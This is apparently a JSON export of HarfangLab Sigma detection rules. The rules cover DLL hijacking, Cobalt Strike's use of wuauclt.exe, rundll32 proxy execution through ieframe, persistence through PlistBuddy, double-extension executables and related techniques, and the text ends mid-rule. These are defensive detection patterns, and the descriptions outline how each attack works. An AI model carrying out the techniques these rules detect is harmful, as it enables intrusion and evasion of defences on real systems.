"content": "title: DLL Hijacking via adobe_licensing_wf_helper.exe\nid: 07ddc2b1-4842-43eb-92d7-df872335fcf9\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'adobe_licensing_wf_helper.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith: '\\libcef.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
"rule_name": "DLL Hijacking via adobe_licensing_wf_helper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "081076fd-302d-429b-88c3-9339633fee72",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070904Z",
"creation_date": "2026-03-23T11:45:34.070906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070910Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_process_wuauclt.yml",
"content": "title: Suspicious wuauclt.exe Execution\nid: 081076fd-302d-429b-88c3-9339633fee72\ndescription: |\n Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\n This can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\n It is recommended to analyze the newly created process and its parents for suspicious behavior or content.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_existing_parent:\n ParentImage|contains: '\\'\n\n filter_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n filter_parentcommandline:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n - '?:\\Windows\\system32\\svchost.exe -k wuausvcs'\n - '?:\\Windows\\system32\\svchost.exe -k bitfsvcs'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_command:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - 
'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\explorer.exe'\n\n exclusion_sihost1:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine:\n - '?:\\windows\\System32\\svchost.exe -k netsvcs'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -s UserManager'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_sihost2:\n Ancestors|contains: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\sihost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "081076fd-302d-429b-88c3-9339633fee72",
"rule_name": "Suspicious wuauclt.exe Execution",
"rule_description": "Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\nThis can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\nIt is recommended to analyze the newly created process and its parents for suspicious behavior or content.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093364Z",
"creation_date": "2026-03-23T11:45:34.093366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093370Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_001_launch_agents_created_plistbuddy.yml",
"content": "title: Launch Agent/Daemon Created via PlistBuddy\nid: 08393432-4fef-4e8b-aa5e-fc13131e09c3\ndescription: |\n Detects the creation of a launch agent or daemon using PlistBuddy.\n Adversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Tool.PlistBuddy\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - '/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage|endswith: '/PlistBuddy'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
"rule_name": "Launch Agent/Daemon Created via PlistBuddy",
"rule_description": "Detects the creation of a launch agent or daemon using PlistBuddy.\nAdversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069400Z",
"creation_date": "2026-03-23T11:45:34.069403Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Ieframe/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_ieframe_proxy_execution.yml",
"content": "title: Proxy Execution via ieframe.dll\nid: 0850e834-f366-4ebb-a022-79bc7b74fc1a\ndescription: |\n Detects a suspicious invocation of ieframe.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Ieframe/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ieframe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_ieframe:\n ParentCommandLine|contains:\n - ' ieframe,'\n - ' ieframe.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'OpenURL'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
"rule_name": "Proxy Execution via ieframe.dll",
"rule_description": "Detects a suspicious invocation of ieframe.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589223Z",
"creation_date": "2026-03-23T11:45:34.589227Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589234Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sihclient.yml",
"content": "title: DLL Hijacking via sihclient.exe\nid: 085b257b-644f-4cc1-bc25-578447cf5bf2\ndescription: |\n Detects potential Windows DLL Hijacking via sihclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\dnsapi.dll'\n - '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
"rule_name": "DLL Hijacking via sihclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sihclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598454Z",
"creation_date": "2026-03-23T11:45:34.598457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598465Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1595/"
],
"name": "t1595_wifi_scanning_airport_macos.yml",
"content": "title: Wi-Fi Networks Scanned via airport\nid: 0882e820-0755-4f74-94e4-b9ae77d3294d\ndescription: |\n Detects the execution of the airport command to scan nearby Wi-Fi networks.\n Attackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1595/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|contains: '/airport'\n CommandLine|contains: ' -s'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
"rule_name": "Wi-Fi Networks Scanned via airport",
"rule_description": "Detects the execution of the airport command to scan nearby Wi-Fi networks.\nAttackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081044Z",
"creation_date": "2026-03-23T11:45:34.081047Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081051Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/007/"
],
"name": "t1036_007_executable_with_multiple_extension.yml",
"content": "title: PE with Multiple Extensions Executed\nid: 08c82317-1fb0-42b6-b3cc-cf85ace1deb8\ndescription: |\n Detects the execution of a suspicious executable with multiple extensions.\n Attackers can add multiple extensions to an executable file to lure users into double clicking on the file.\n Since Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\n It is recommended to analyze the executed file to determine whether its execution is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/007/\ndate: 2021/03/30\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '(?i)\\.(?:xlsx?|pptx?|docx?|pdf|zip|rar|7z|png|jpe?g|bmp|gif|psd|tiff)\\s{0,4}\\.exe$'\n\n exclusion_ranorex:\n Image|endswith: '\\Ranorex.PDF.exe'\n OriginalFileName: 'Ranorex.PDF.exe'\n InternalName: 'Ranorex.PDF.exe'\n\n exclusion_portablegit:\n Image|endswith: '\\PortableGit-*.7z.exe'\n Signature: 'Johannes Schindelin'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
"rule_name": "PE with Multiple Extensions Executed",
"rule_description": "Detects the execution of a suspicious executable with multiple extensions.\nAttackers can add multiple extensions to an executable file to lure users into double clicking on the file.\nSince Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\nIt is recommended to analyze the executed file to determine whether its execution is legitimate.\n",
"rule_creation_date": "2021-03-30",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.007",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "08ddafaf-401d-4c3d-9389-e96925e90f0f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628428Z",
"creation_date": "2026-03-23T11:45:34.628430Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628434Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1204_002_shared_folder_execution.yml",
"content": "title: File Executed from Users Shared Folder\nid: 08ddafaf-401d-4c3d-9389-e96925e90f0f\ndescription: |\n Detects the execution of a file from the Users shared folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|startswith: '/Users/shared/'\n GrandparentImage|contains: '?'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_relocated:\n Image|startswith: '/Users/Shared/Relocated Items/Security/Applications/'\n GrandparentImage:\n - '/sbin/launchd'\n - '/Users/Shared/Relocated Items/Security/Applications/*'\n\n exclusion_gimp:\n ProcessGrandparentImage: '/Users/Shared/Previously Relocated Items/Security/GIMP.app/Contents/MacOS/GIMP-bin'\n # todo: add signature\n\n exclusion_logioption:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.logi.optionsplus.*'\n\n exclusion_hotreload:\n ProcessGrandparentImage:\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/MacOS/HotReload'\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/Resources/CodePatcherCLI'\n # todo: add signature\n\n exclusion_riotgames:\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot 
Client.app/Contents/Frameworks/Riot Client Helper (Renderer).app/Contents/MacOS/Riot Client Helper (Renderer)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (GPU).app/Contents/MacOS/Riot Client Helper (GPU)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper.app/Contents/MacOS/Riot Client Helper'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Helpers/chrome_crashpad_handler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - Image: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientCrashHandler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/macos/riot client'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/frameworks/riot client helper (renderer).app/contents/macos/riot client helper (renderer)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.riotgames.RiotGames.*'\n\n exclusion_lghub:\n - ParentImage: 